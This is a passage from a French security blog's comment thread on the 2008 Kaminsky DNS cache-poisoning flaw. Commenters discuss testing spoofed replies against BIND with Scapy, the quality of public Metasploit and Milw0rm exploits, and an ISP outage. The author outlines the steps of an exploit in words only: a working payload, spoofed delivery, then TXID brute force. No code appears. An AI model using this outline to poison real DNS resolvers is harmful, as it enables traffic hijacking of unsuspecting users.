Si le BIND "spoofé" répond plus vite que Scapy c'est pas gagné, et, tout du moins dans mon cas, cela a semblé être le cas dans mes tests (<troll>sans parler de la "qualité" des outils que j'ai utilisé par pure fainéantise de faire ça by myself</troll>).

C'est un peu ce que je comprends de ça:

http://blog.metasploit.com/2008/07/bailiwicked-automatic-tuning.html

Solution: introduire de la latence sur le lan de test ou tout bêtement dropper les réponses du serveur spoofé ?

29. Le samedi 26 juillet 2008 à 16:27, par funkinessflavor

jj: Je ne vise pas l'attaque proposé par Mr K (je n'ai pas encore le niveau), je veux simplement leurrer un petit nslookup.

30. Le dimanche 27 juillet 2008 à 14:39, par JF

Free était indisponible vendredi après minuit.
http://forums.grenouille.com/index.php?showtopic=107197

Merci Cédric...

Réponse de Sid

J'ai peur de mal comprendre ce "merci".

Car il est évident que c'est la première fois que Free est indisponible ou qu'ils ont des problèmes de DNS, que ces problèmes de résolutions ne se produisaient pas depuis plusieurs jours (et sans aucune solution proposée, pas même OpenDNS), genre avant la publication de quoi que ce soit, qu'il n'a pas pu être résolu en moins de deux heures et que certains ne l'ont même pas senti passer... Impensable enfin qu'il puisse s'agir de complètement autre chose... Non, puisqu'on vous dit que le truc à la mode, la cause de tous les maux, the r00t of all 3vil, c'est la faille DNS !

Bref, serais-tu en train de dire que les DNS de Free (contrairement à ce que j'ai pu constater) ou ne tiendraient pas la charge ? Parce que si les serveurs sont patchés (et ils l'étaient), quelle que soit la gueule de l'exploit, le résultat sera le même, qu'il s'agisse du premier de MSF, du second, de celui-ci chez Milw0rm dont je doute de l'efficacité ou de celui-là.

Merci JF...

31. Le lundi 28 juillet 2008 à 08:28, par Yom

" (...) de celui-ci chez Milw0rm dont je doute de l'efficacité ou de celui-là."

Sachant que pour l'avoir aussi testé, "celui-là" ne semble pas convaincant non plus. :-)

Réponse de Sid

Si j'étais toi, je commencerais par me trouver un payload qui marche. Ensuite, j'écrirai un petit programme qui permet de délivrer ce payload en spoofant une réponse, un peu comme ce qu'essaye de faire funkinessflavor. Et enfin, mais seulement enfin, je m'intéresserais à coller le bruteforce de TXID dessus.

Parce que pas mal d'exploits qu'on voit passer échouent lamentablement à la première étape, parfois à la seconde... Moi j'dis ça, j'dis rien...

32. Le lundi 28 juillet 2008 à 12:01, par Yom

Tester les "exploits" disponibles me permet de mesurer l'impact Script-Kiddie sur l'échelle du risque.

Réponse de Sid

Une démo dans laquelle tu peux voir le premier exploit MSF en action :
http://www.infobyte.com.ar/demo/evilgrade.htm

Les conditions n'exploitation sont un peu gnangnan, genre cache complètement vide, mais bon, ça donne l'idée.

33. Le lundi 28 juillet 2008 à 13:21, par Yann

@ JF : ca se serait si Free était un bon provider, non ? Même avec un oeil externe (comprendre que je ne suis pas chez Free), j'entends tellement de chose à leur sujet que je me permetterais pas d'accuser ceux qui donnent des informations sur cette fameuse faille DNS !

34. Le mardi 29 juillet 2008 à 10:43, par Ulysse

Ici il pleut! Merci Cedric...

Sinon merci pour ta série de billets : "les failles DNS pour les nuls" j'ai tout compris, c'est dire!

35. Le lundi 4 août 2008 à 17:23, par Pat

Bon, donc finalement qui va monter sur la scène de BlackHat, comme promis, avec Mr K-ki-se-la-pète ? Tu y seras Sid ?

Réponse de Sid

Je pense que cet "honneur" revient dans aucun doute à Halvar. Quant à savoir si j'y serai, je me demande encore. Sur ce slot, d'autres talks comme les rootkits SMM ou les systèmes d'autoroute pourraient se révéler plus intéressants.

36. Le lundi 25 août 2008 à 16:36, par Boss

Hello Sid,

Je profite de ton post DNS pour communiquer sur notre blog. je t'y joins un backtrack sur notre post DNS. Bien à toi.

Réponse de Sid

Limite pub...

Ma petite parcelle d'Internet...